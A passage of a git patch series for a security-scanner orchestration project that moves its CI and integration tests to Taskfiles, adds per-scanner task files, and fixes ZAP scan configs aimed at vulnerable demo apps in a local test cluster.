e6ba36a043..19ea695dfd 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -444,6 +444,11 @@ jobs: - name: Install bun uses: oven-sh/setup-bun@v2 + - name: Install Task + uses: arduino/setup-task@v2 + with: + version: 3.x + - name: Download Kind uses: actions/download-artifact@v4 with: @@ -474,24 +479,6 @@ jobs: kubectl version || true helm version - - name: Install ParserSDK Dependencies - working-directory: ./parser-sdk/nodejs/ - run: bun install - - - name: Setup parser-sdk for unit tests - working-directory: ./scanners/ - run: bun install - - - name: Install integration test helper dependencies - working-directory: ./tests/integration/ - run: bun install - - - name: Install Dependencies - working-directory: ./scanners/${{ matrix.unit }}/parser/ - #install dependencies for the parser if the directory has a package.json - if: exists('./scanners/${{ matrix.unit }}/parser/package.json') - run: bun install - - name: Unit Tests working-directory: ./scanners/${{ matrix.unit }}/ run: bun test --coverage parser/ @@ -507,67 +494,46 @@ jobs: docker load --input /tmp/parser-sdk.tar docker images | grep sdk - - name: Build Images - working-directory: ./scanners/${{ matrix.unit }}/ - run: make docker-build - - - name: Export Docker Images - working-directory: ./scanners/${{ matrix.unit }}/ - run: make docker-export - - - name: "Start kind cluster" - run: | - kind version - kind create cluster --wait 3m --image "$KIND_NODE_IMAGE" - - - name: "Inspect kind cluster" - run: | - kubectl config current-context - kubectl get node - - name: Download Operator Image uses: actions/download-artifact@v4 with: name: operator-image path: ./operator + - name: Load Operator Image + run: | + docker load --input ./operator/operator.tar + docker images | grep operator + - name: Download Lurker Image uses: actions/download-artifact@v4 with: name: lurker-image path: ./operator - - name: Import Operator & Lurker Image to kind cluster - working-directory: ./operator - run: make kind-import - - - name: Kind Import ${{ matrix.unit }} Image to kind cluster - working-directory: ./scanners/${{ matrix.unit }}/ - run: make kind-import + - name: Load Lurker Image + run: | + docker load --input ./operator/lurker.tar + docker images | grep lurker - - name: Deploy Operator Chart to kind cluster - working-directory: ./operator + - name: "Start kind cluster" run: | - make helm-deploy + task prepare-testing-env - - name: Deploy ${{ matrix.unit }} Chart to kind cluster + - name: ${{ matrix.unit }} Build Scanner / Parser Images working-directory: ./scanners/${{ matrix.unit }}/ - run: make deploy + run: task build - - name: Deploy Test Dependencies + - name: ${{ matrix.unit }} Load and Deploy Scanner / Parser Images to kind Cluster working-directory: ./scanners/${{ matrix.unit }}/ - run: make deploy-test-deps + run: task deploy - name: Start Integration Tests uses: nick-fields/retry@ce71cc2ab81d554ebbe88c79ab5975992d79ba08 # v3.0.2 with: timeout_minutes: 15 max_attempts: 3 - command: cd ./scanners/${{ matrix.unit }}/ && bun test integration-tests/ - env: - # Workaround for https://github.com/oven-sh/bun/issues/7332 - # not great, but this is a local connection to the kind cluster - NODE_TLS_REJECT_UNAUTHORIZED: 0 + command: cd ./scanners/${{ matrix.unit }}/ && task test:integration # ---- Debuging Cluster on Failure ---- From c3ad80c05a289aab980a6234190e633b10fa832a Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Tue, 1 Jul 2025 23:23:00 +0200 Subject: [PATCH 045/137] use task for executing the unit tests ensure that the testing deps are installed --- .github/workflows/ci.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 19ea695dfd..7ab2f5c856 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -481,7 +481,7 @@ jobs: - name: Unit Tests working-directory: ./scanners/${{ matrix.unit }}/ - run: bun test --coverage parser/ + run: task test:unit - name: Download Parser SDK Image uses: actions/download-artifact@v4 From 5abb16128fb9aff60628e33fb2751ca518e06adf Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 09:33:16 +0200 Subject: [PATCH 046/137] Adopt taskfile for amass and fix parser --- scanners/amass/Taskfile.yaml | 10 ++++++++++ scanners/amass/parser/parser.js | 2 +- 2 files changed, 11 insertions(+), 1 deletion(-) create mode 100644 scanners/amass/Taskfile.yaml diff --git a/scanners/amass/Taskfile.yaml b/scanners/amass/Taskfile.yaml new file mode 100644 index 0000000000..fe71ba1385 --- /dev/null +++ b/scanners/amass/Taskfile.yaml @@ -0,0 +1,10 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: amass + +tasks: {} diff --git a/scanners/amass/parser/parser.js b/scanners/amass/parser/parser.js index 25c055207c..f60164d0aa 100644 --- a/scanners/amass/parser/parser.js +++ b/scanners/amass/parser/parser.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -import * as sqlite from "sqlite3"; +import sqlite from "sqlite3"; import { writeFile } from "node:fs/promises"; import { join } from "node:path"; import { tmpdir } from "node:os"; From aca49393476048a2f31d0d5b88051f52250b01bb Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 09:33:24 +0200 Subject: [PATCH 047/137] Add nginx demo target --- demo-targets/Taskfile.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/demo-targets/Taskfile.yaml b/demo-targets/Taskfile.yaml index 0a0546d496..16222028ee 100644 --- a/demo-targets/Taskfile.yaml +++ b/demo-targets/Taskfile.yaml @@ -67,3 +67,9 @@ tasks: task: deploy:app vars: app: vulnerable-log4j + + deploy:nginx: + cmds: + # Delete leftover nginx's. Unfortunately can't create deployment only if not exists (like namespaces) + - kubectl create deployment --image nginx:alpine nginx --namespace demo-targets --dry-run=client -o yaml | kubectl apply -f - + - kubectl expose deployment nginx --port 80 --namespace demo-targets --dry-run=client -o yaml | kubectl apply -f - From 72b31935444e887572c502f44a9a489097251ace Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 09:43:34 +0200 Subject: [PATCH 048/137] Remove placeholder task --- scanners/nmap/Taskfile.yaml | 7 +------ 1 file changed, 1 insertion(+), 6 deletions(-) diff --git a/scanners/nmap/Taskfile.yaml b/scanners/nmap/Taskfile.yaml index b355b9e871..ff0096deb3 100644 --- a/scanners/nmap/Taskfile.yaml +++ b/scanners/nmap/Taskfile.yaml @@ -7,9 +7,4 @@ includes: vars: scannerName: nmap -tasks: - default: - desc: Build the Docker image for the Nmap scanner - cmds: - - docker build -t securecodebox/nmap:${IMG_TAG} . - silent: true +tasks: {} From 0c3af6d84ad6ecd68cdd81b596471bd6120a4aa1 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 09:44:12 +0200 Subject: [PATCH 049/137] Simplify demo target setup now that the predeploy step is there this is easier and the setups are run in parralel which is also nice --- scanners/Taskfile.yaml | 14 +------------ scanners/nuclei/Taskfile.yaml | 4 ++-- .../zap-automation-framework/Taskfile.yaml | 20 +++++++++++++++++++ 3 files changed, 23 insertions(+), 15 deletions(-) create mode 100644 scanners/zap-automation-framework/Taskfile.yaml diff --git a/scanners/Taskfile.yaml b/scanners/Taskfile.yaml index ee5937648e..0602090c76 100644 --- a/scanners/Taskfile.yaml +++ b/scanners/Taskfile.yaml @@ -1,7 +1,7 @@ version: "3" includes: - demo-apps: + demo-targets: taskfile: ../demo-targets/Taskfile.yaml internal: true core: @@ -9,8 +9,6 @@ includes: internal: true vars: - # demo apps required for integration tests, e.g. "bodgeit juice-shop", etc. reference the demo apps in the demo-targets/Taskfile.yaml - demoAppsRequiredForIntegrationTests: '{{ .demoAppsRequiredForIntegrationTests | default "" }}' # if the scanner uses a custom scanner container image which needs to be built. Usually false as we prefer to reference the official scanner container images hasCustomScanner: sh: 'if [ -d "{{ .ROOT_DIR }}/scanner/" ]; then echo "true"; else echo "false"; fi' @@ -144,16 +142,6 @@ tasks: - msg: "{{ .scannerName }} scan type is not deployed, run 'task build deploy' from scanner dir first" sh: "kubectl get scantypes {{ .scannerName }} -n integration-tests | grep -q '{{ .scannerName }}' || false" cmds: - - | - {{ if eq "" .demoAppsRequiredForIntegrationTests -}} - echo "No demo applications required for integration tests for {{ .scannerName }}" - {{ else -}} - echo "Deploying demo applications required for integration tests for {{ .scannerName }}: {{ .demoAppsRequiredForIntegrationTests }}" - {{ end -}} - - for: - var: demoAppsRequiredForIntegrationTests - task: demo-apps:deploy:{{ .ITEM }} - # Workaround for https://github.com/oven-sh/bun/issues/7332 - 'echo "Forwarding the Kubernetes API to localhost"' - kubectl proxy >/dev/null 2>&1 & diff --git a/scanners/nuclei/Taskfile.yaml b/scanners/nuclei/Taskfile.yaml index f07aa22069..47ceba96ea 100644 --- a/scanners/nuclei/Taskfile.yaml +++ b/scanners/nuclei/Taskfile.yaml @@ -8,14 +8,14 @@ includes: - predeploy vars: scannerName: nuclei - demoAppsRequiredForIntegrationTests: "bodgeit" additionalHelmInstallArgsForScanner: | --set="scanner.image.pullPolicy=IfNotPresent" \ --set="nucleiTemplateCache.enabled=false" \ tasks: predeploy: - desc: This is a dummy task to ensure the scanner Taskfile is included correctly + deps: + - demo-targets:deploy:bodgeit cmds: - | # create a nuclei template configmap from inline definition diff --git a/scanners/zap-automation-framework/Taskfile.yaml b/scanners/zap-automation-framework/Taskfile.yaml new file mode 100644 index 0000000000..b0adedb79b --- /dev/null +++ b/scanners/zap-automation-framework/Taskfile.yaml @@ -0,0 +1,20 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: zap-automation-framework + +tasks: + predeploy: + deps: + - demo-targets:deploy:juice-shop + - demo-targets:deploy:bodgeit + - demo-targets:deploy:nginx + - demo-targets:deploy:swagger-petstore + cmds: + - kubectl apply -f ./integration-tests/automation-framework-configMap.yaml -n integration-tests From 3ebd5d6aa4876362e9f16b2250b9abfb1422cbbc Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 09:51:05 +0200 Subject: [PATCH 050/137] Fix urls for demo targets --- .../automation-framework-configMap.yaml | 25 +++++++++---------- 1 file changed, 12 insertions(+), 13 deletions(-) diff --git a/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml b/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml index 0ebd3f3f23..788ff04756 100644 --- a/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml +++ b/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml @@ -2,7 +2,6 @@ # # SPDX-License-Identifier: Apache-2.0 - --- apiVersion: v1 kind: ConfigMap @@ -14,9 +13,9 @@ data: env: # The environment, mandatory contexts: # List of 1 or more contexts, mandatory - name: test-config # Name to be used to refer to this context in other jobs, mandatory - urls: ["http://juiceshop.demo-targets.svc:3000"] # A mandatory list of top level urls, everything under each url will be included + urls: ["http://juice-shop.demo-targets.svc:3000"] # A mandatory list of top level urls, everything under each url will be included includePaths: - - "http://juiceshop.demo-targets.svc:3000/.*" # An optional list of regexes to include + - "http://juice-shop.demo-targets.svc:3000/.*" # An optional list of regexes to include excludePaths: - ".*socket\\.io.*" - ".*\\.png" @@ -29,20 +28,20 @@ data: authentication: method: "json" parameters: - loginPageUrl: "http://juiceshop.demo-targets.svc:3000/rest/user" - loginRequestUrl: "http://juiceshop.demo-targets.svc:3000/rest/user/login" + loginPageUrl: "http://juice-shop.demo-targets.svc:3000/rest/user" + loginRequestUrl: "http://juice-shop.demo-targets.svc:3000/rest/user/login" loginRequestBody: '{"email":"admin@juice-sh.op","password":"admin123"}' verification: method: "response" loggedOutRegex: '\Q{"user":{}}\E' loggedInRegex: '\Q\E' users: - - name: "juiceshop-user-1" + - name: "juice-shop-user-1" credentials: username: "admin@juice-sh.op" password: "admin123" parameters: - failOnError: true # If set exit on an error + failOnError: true # If set exit on an error failOnWarning: false # If set exit on a warning progressToStdout: true # If set will write job progress to stdout @@ -96,7 +95,7 @@ data: - ".*\\.ttf" - ".*\\.ico" # An optional list of regexes to exclude parameters: - failOnError: true # If set exit on an error + failOnError: true # If set exit on an error failOnWarning: false # If set exit on a warning progressToStdout: true # If set will write job progress to stdout @@ -149,7 +148,7 @@ data: - ".*\\.ttf" - ".*\\.ico" # An optional list of regexes to exclude parameters: - failOnError: true # If set exit on an error + failOnError: true # If set exit on an error failOnWarning: false # If set exit on a warning progressToStdout: true # If set will write job progress to stdout @@ -182,9 +181,9 @@ data: env: # The environment, mandatory contexts: # List of 1 or more contexts, mandatory - name: test-config # Name to be used to refer to this context in other jobs, mandatory - urls: ["http://petstore.demo-targets.svc"] # A mandatory list of top level urls, everything under each url will be included + urls: ["http://swagger-petstore.demo-targets.svc"] # A mandatory list of top level urls, everything under each url will be included includePaths: - - "http://petstore.demo-targets.svc/.*" # An optional list of regexes to include + - "http://swagger-petstore.demo-targets.svc/.*" # An optional list of regexes to include excludePaths: - ".*socket\\.io.*" - ".*\\.png" @@ -195,7 +194,7 @@ data: - ".*\\.ttf" - ".*\\.ico" # An optional list of regexes to exclude parameters: - failOnError: true # If set exit on an error + failOnError: true # If set exit on an error failOnWarning: false # If set exit on a warning progressToStdout: true # If set will write job progress to stdout @@ -216,4 +215,4 @@ data: risks: # List: The risks to include in this report, default all - high - medium - - low \ No newline at end of file + - low From 994a40b77466aab61fcf2ed100cb773964f56cfc Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 09:55:58 +0200 Subject: [PATCH 051/137] More consistent comment spacing --- .../automation-framework-configMap.yaml | 98 +++++++++---------- 1 file changed, 49 insertions(+), 49 deletions(-) diff --git a/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml b/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml index 788ff04756..db375d3d1d 100644 --- a/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml +++ b/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml @@ -11,11 +11,11 @@ data: automation.yaml: |- env: # The environment, mandatory - contexts: # List of 1 or more contexts, mandatory - - name: test-config # Name to be used to refer to this context in other jobs, mandatory - urls: ["http://juice-shop.demo-targets.svc:3000"] # A mandatory list of top level urls, everything under each url will be included + contexts: # List of 1 or more contexts, mandatory + - name: test-config # Name to be used to refer to this context in other jobs, mandatory + urls: ["http://juice-shop.demo-targets.svc:3000"] # A mandatory list of top level urls, everything under each url will be included includePaths: - - "http://juice-shop.demo-targets.svc:3000/.*" # An optional list of regexes to include + - "http://juice-shop.demo-targets.svc:3000/.*" # An optional list of regexes to include excludePaths: - ".*socket\\.io.*" - ".*\\.png" @@ -24,7 +24,7 @@ data: - ".*\\.woff" - ".*\\.woff2" - ".*\\.ttf" - - ".*\\.ico" # An optional list of regexes to exclude + - ".*\\.ico" # An optional list of regexes to exclude authentication: method: "json" parameters: @@ -52,21 +52,21 @@ data: scanOnlyInScope: true # Bool: Only scan URLs in scope (recommended) - type: spider # The traditional spider - fast but doesnt handle modern apps so well parameters: - context: test-config # String: Name of the context to spider, default: first context - user: juiceshop-user-1 # String: An optional user to use for authentication, must be defined in the env - maxDuration: 2 # Int: The max time in minutes the spider will be allowed to run for, default: 0 unlimited + context: test-config # String: Name of the context to spider, default: first context + user: juiceshop-user-1 # String: An optional user to use for authentication, must be defined in the env + maxDuration: 2 # Int: The max time in minutes the spider will be allowed to run for, default: 0 unlimited - type: spiderAjax # The ajax spider - slower than the spider but handles modern apps well parameters: - context: test-config # String: Name of the context to spider, default: first context - maxDuration: 2 # Int: The max time in minutes the ajax spider will be allowed to run for, default: 0 unlimited + context: test-config # String: Name of the context to spider, default: first context + maxDuration: 2 # Int: The max time in minutes the ajax spider will be allowed to run for, default: 0 unlimited - type: passiveScan-wait # Passive scan wait for the passive scanner to finish parameters: - maxDuration: 10 # Int: The max time to wait for the passive scanner, default: 0 unlimited + maxDuration: 10 # Int: The max time to wait for the passive scanner, default: 0 unlimited - type: report # Report generation parameters: - template: traditional-xml # String: The template id, default : modern - reportDir: /home/securecodebox/ # String: The directory into which the report will be written - reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] + template: traditional-xml # String: The template id, default : modern + reportDir: /home/securecodebox/ # String: The directory into which the report will be written + reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] risks: # List: The risks to include in this report, default all - high - medium @@ -80,11 +80,11 @@ data: automation.yaml: |- env: # The environment, mandatory - contexts : # List of 1 or more contexts, mandatory - - name: test-config # Name to be used to refer to this context in other jobs, mandatory - urls: ["http://nginx.demo-targets.svc"] # A mandatory list of top level urls, everything under each url will be included + contexts: # List of 1 or more contexts, mandatory + - name: test-config # Name to be used to refer to this context in other jobs, mandatory + urls: ["http://nginx.demo-targets.svc"] # A mandatory list of top level urls, everything under each url will be included includePaths: - - "http://nginx.demo-targets.svc/.*" # An optional list of regexes to include + - "http://nginx.demo-targets.svc/.*" # An optional list of regexes to include excludePaths: - ".*socket\\.io.*" - ".*\\.png" @@ -93,7 +93,7 @@ data: - ".*\\.woff" - ".*\\.woff2" - ".*\\.ttf" - - ".*\\.ico" # An optional list of regexes to exclude + - ".*\\.ico" # An optional list of regexes to exclude parameters: failOnError: true # If set exit on an error failOnWarning: false # If set exit on a warning @@ -106,20 +106,20 @@ data: scanOnlyInScope: true # Bool: Only scan URLs in scope (recommended) - type: spider # The traditional spider - fast but doesnt handle modern apps so well parameters: - context: test-config # String: Name of the context to spider, default: first context - maxDuration: 1 # Int: The max time in minutes the spider will be allowed to run for, default: 0 unlimited + context: test-config # String: Name of the context to spider, default: first context + maxDuration: 1 # Int: The max time in minutes the spider will be allowed to run for, default: 0 unlimited - type: spiderAjax # The ajax spider - slower than the spider but handles modern apps well parameters: - context: test-config # String: Name of the context to spider, default: first context - maxDuration: 1 # Int: The max time in minutes the ajax spider will be allowed to run for, default: 0 unlimited + context: test-config # String: Name of the context to spider, default: first context + maxDuration: 1 # Int: The max time in minutes the ajax spider will be allowed to run for, default: 0 unlimited - type: passiveScan-wait # Passive scan wait for the passive scanner to finish parameters: - maxDuration: 10 # Int: The max time to wait for the passive scanner, default: 0 unlimited + maxDuration: 10 # Int: The max time to wait for the passive scanner, default: 0 unlimited - type: report # Report generation parameters: - template: traditional-xml # String: The template id, default : modern - reportDir: /home/securecodebox/ # String: The directory into which the report will be written - reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] + template: traditional-xml # String: The template id, default : modern + reportDir: /home/securecodebox/ # String: The directory into which the report will be written + reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] risks: # List: The risks to include in this report, default all - high - medium @@ -133,11 +133,11 @@ data: automation.yaml: |- env: # The environment, mandatory - contexts: # List of 1 or more contexts, mandatory - - name: test-config # Name to be used to refer to this context in other jobs, mandatory - urls: ["http://bodgeit.demo-targets.svc:8080"] # A mandatory list of top level urls, everything under each url will be included + contexts: # List of 1 or more contexts, mandatory + - name: test-config # Name to be used to refer to this context in other jobs, mandatory + urls: ["http://bodgeit.demo-targets.svc:8080"] # A mandatory list of top level urls, everything under each url will be included includePaths: - - "http://bodgeit.demo-targets.svc:8080/.*" # An optional list of regexes to include + - "http://bodgeit.demo-targets.svc:8080/.*" # An optional list of regexes to include excludePaths: - ".*socket\\.io.*" - ".*\\.png" @@ -146,7 +146,7 @@ data: - ".*\\.woff" - ".*\\.woff2" - ".*\\.ttf" - - ".*\\.ico" # An optional list of regexes to exclude + - ".*\\.ico" # An optional list of regexes to exclude parameters: failOnError: true # If set exit on an error failOnWarning: false # If set exit on a warning @@ -155,17 +155,17 @@ data: jobs: - type: spider # The traditional spider - fast but doesnt handle modern apps so well parameters: - context: test-config # String: Name of the context to spider, default: first context - maxDuration: 1 # Int: The max time in minutes the spider will be allowed to run for, default: 0 unlimited + context: test-config # String: Name of the context to spider, default: first context + maxDuration: 1 # Int: The max time in minutes the spider will be allowed to run for, default: 0 unlimited - type: spiderAjax # The ajax spider - slower than the spider but handles modern apps well parameters: - context: test-config # String: Name of the context to spider, default: first context + context: test-config # String: Name of the context to spider, default: first context maxDuration: 1 - type: report # Report generation parameters: - template: traditional-xml # String: The template id, default : modern - reportDir: /home/securecodebox/ # String: The directory into which the report will be written - reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] + template: traditional-xml # String: The template id, default : modern + reportDir: /home/securecodebox/ # String: The directory into which the report will be written + reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] risks: # List: The risks to include in this report, default all - high - medium @@ -179,11 +179,11 @@ data: automation.yaml: |- env: # The environment, mandatory - contexts: # List of 1 or more contexts, mandatory - - name: test-config # Name to be used to refer to this context in other jobs, mandatory - urls: ["http://swagger-petstore.demo-targets.svc"] # A mandatory list of top level urls, everything under each url will be included + contexts: # List of 1 or more contexts, mandatory + - name: test-config # Name to be used to refer to this context in other jobs, mandatory + urls: ["http://swagger-petstore.demo-targets.svc"] # A mandatory list of top level urls, everything under each url will be included includePaths: - - "http://swagger-petstore.demo-targets.svc/.*" # An optional list of regexes to include + - "http://swagger-petstore.demo-targets.svc/.*" # An optional list of regexes to include excludePaths: - ".*socket\\.io.*" - ".*\\.png" @@ -192,7 +192,7 @@ data: - ".*\\.woff" - ".*\\.woff2" - ".*\\.ttf" - - ".*\\.ico" # An optional list of regexes to exclude + - ".*\\.ico" # An optional list of regexes to exclude parameters: failOnError: true # If set exit on an error failOnWarning: false # If set exit on a warning @@ -201,17 +201,17 @@ data: jobs: - type: spider # The traditional spider - fast but doesnt handle modern apps so well parameters: - context: test-config # String: Name of the context to spider, default: first context - maxDuration: 1 # Int: The max time in minutes the spider will be allowed to run for, default: 0 unlimited + context: test-config # String: Name of the context to spider, default: first context + maxDuration: 1 # Int: The max time in minutes the spider will be allowed to run for, default: 0 unlimited - type: spiderAjax # The ajax spider - slower than the spider but handles modern apps well parameters: - context: test-config # String: Name of the context to spider, default: first context + context: test-config # String: Name of the context to spider, default: first context maxDuration: 1 - type: report # Report generation parameters: - template: traditional-xml # String: The template id, default : modern - reportDir: /home/securecodebox/ # String: The directory into which the report will be written - reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] + template: traditional-xml # String: The template id, default : modern + reportDir: /home/securecodebox/ # String: The directory into which the report will be written + reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] risks: # List: The risks to include in this report, default all - high - medium From 4fbffe62329d3b74db5049d67967ac5efdce8e89 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 10:15:27 +0200 Subject: [PATCH 052/137] Make sure nginx task can run on it's own --- demo-targets/Taskfile.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/demo-targets/Taskfile.yaml b/demo-targets/Taskfile.yaml index 16222028ee..1983dbb440 100644 --- a/demo-targets/Taskfile.yaml +++ b/demo-targets/Taskfile.yaml @@ -70,6 +70,6 @@ tasks: deploy:nginx: cmds: - # Delete leftover nginx's. Unfortunately can't create deployment only if not exists (like namespaces) + - kubectl create namespace demo-targets --dry-run=client -o yaml | kubectl apply -f - - kubectl create deployment --image nginx:alpine nginx --namespace demo-targets --dry-run=client -o yaml | kubectl apply -f - - kubectl expose deployment nginx --port 80 --namespace demo-targets --dry-run=client -o yaml | kubectl apply -f - From 4ca4ee296b5fb4d7fefbe96a9a20d4bcdb8ad4b1 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 10:15:57 +0200 Subject: [PATCH 053/137] remove risk filter --- .../automation-framework-configMap.yaml | 16 ---------------- 1 file changed, 16 deletions(-) diff --git a/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml b/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml index db375d3d1d..f4b7f8c3d7 100644 --- a/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml +++ b/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml @@ -67,10 +67,6 @@ data: template: traditional-xml # String: The template id, default : modern reportDir: /home/securecodebox/ # String: The directory into which the report will be written reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] - risks: # List: The risks to include in this report, default all - - high - - medium - - low --- apiVersion: v1 kind: ConfigMap @@ -120,10 +116,6 @@ data: template: traditional-xml # String: The template id, default : modern reportDir: /home/securecodebox/ # String: The directory into which the report will be written reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] - risks: # List: The risks to include in this report, default all - - high - - medium - - low --- apiVersion: v1 kind: ConfigMap @@ -166,10 +158,6 @@ data: template: traditional-xml # String: The template id, default : modern reportDir: /home/securecodebox/ # String: The directory into which the report will be written reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] - risks: # List: The risks to include in this report, default all - - high - - medium - - low --- apiVersion: v1 kind: ConfigMap @@ -212,7 +200,3 @@ data: template: traditional-xml # String: The template id, default : modern reportDir: /home/securecodebox/ # String: The directory into which the report will be written reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] - risks: # List: The risks to include in this report, default all - - high - - medium - - low From 810b3402240cab138f480545e8a07007a8b5e88d Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 10:17:04 +0200 Subject: [PATCH 054/137] Fix juice shop user reference --- .../integration-tests/automation-framework-configMap.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml b/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml index f4b7f8c3d7..652e7053df 100644 --- a/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml +++ b/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml @@ -53,7 +53,7 @@ data: - type: spider # The traditional spider - fast but doesnt handle modern apps so well parameters: context: test-config # String: Name of the context to spider, default: first context - user: juiceshop-user-1 # String: An optional user to use for authentication, must be defined in the env + user: juice-shop-user-1 # String: An optional user to use for authentication, must be defined in the env maxDuration: 2 # Int: The max time in minutes the spider will be allowed to run for, default: 0 unlimited - type: spiderAjax # The ajax spider - slower than the spider but handles modern apps well parameters: From 8bd0bd0ed3a388d8b2848877188069cb65d95244 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 10:35:48 +0200 Subject: [PATCH 055/137] Fix operator status check --- Taskfile.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Taskfile.yaml b/Taskfile.yaml index 70319da434..10487b0a23 100644 --- a/Taskfile.yaml +++ b/Taskfile.yaml @@ -56,7 +56,7 @@ tasks: --set="lurker.image.tag=${IMG_TAG}" \ --set="lurker.image.pullPolicy=IfNotPresent" status: - - kubectl get deployment -n securecodebox-system securecodebox-operator | grep "1/1" || exit 1 + - kubectl get deployment -n securecodebox-system securecodebox-controller-manager | grep "1/1" || false build-parser-sdk-image: cmds: From 84f10c5dfb2e2492977ceff5648a653a4e4a24b4 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 10:37:26 +0200 Subject: [PATCH 056/137] Add task for cmseek --- scanners/cmseek/Taskfile.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 scanners/cmseek/Taskfile.yaml diff --git a/scanners/cmseek/Taskfile.yaml b/scanners/cmseek/Taskfile.yaml new file mode 100644 index 0000000000..bab4ffd486 --- /dev/null +++ b/scanners/cmseek/Taskfile.yaml @@ -0,0 +1,16 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: cmseek + +tasks: + predeploy: + deps: + - demo-targets:deploy:old-joomla + cmds: [] From 130b3456363399bba8ecc67c80667a29e200ae92 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 11:07:42 +0200 Subject: [PATCH 057/137] Add back config volume --- scanners/ffuf/scanner/Dockerfile | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/scanners/ffuf/scanner/Dockerfile b/scanners/ffuf/scanner/Dockerfile index d121f101d9..cf06ccb103 100644 --- a/scanners/ffuf/scanner/Dockerfile +++ b/scanners/ffuf/scanner/Dockerfile @@ -6,8 +6,12 @@ FROM --platform=$BUILDPLATFORM golang:1.24-alpine AS builder ARG scannerVersion RUN GOOS=$TARGETOS GOARCH=$TARGETARCH CGO_ENABLED=0 go install github.com/ffuf/ffuf/v2@$scannerVersion +RUN mkdir -p /home/ffuf/.config/ffuf +RUN mkdir -p /home/ffuf/.config/ffuf/scraper + FROM gcr.io/distroless/static-debian12:nonroot COPY --from=builder --chown=root:root --chmod=755 /go/bin/ffuf /usr/local/bin/ffuf +COPY --from=builder --chown=nonroot:nonroot /home/ffuf/.config/ffuf /home/nonroot/.config/ffuf WORKDIR /home/nonroot From 1a682fbbc7127917c676537f39f9fcaf72ad1973 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 11:08:07 +0200 Subject: [PATCH 058/137] Properly migrate ffuf --- scanners/ffuf/Taskfile.yaml | 17 +++ scanners/ffuf/integration-tests/ffuf.test.js | 6 +- .../ffuf/parser/__testFiles__/juice-shop.json | 126 ++++++++++++++++++ .../__testFiles__/juice-shop.json.license | 3 + scanners/ffuf/parser/parser.js | 66 ++++----- scanners/ffuf/parser/parser.test.js | 106 ++++++++++++--- 6 files changed, 270 insertions(+), 54 deletions(-) create mode 100644 scanners/ffuf/Taskfile.yaml create mode 100644 scanners/ffuf/parser/__testFiles__/juice-shop.json create mode 100644 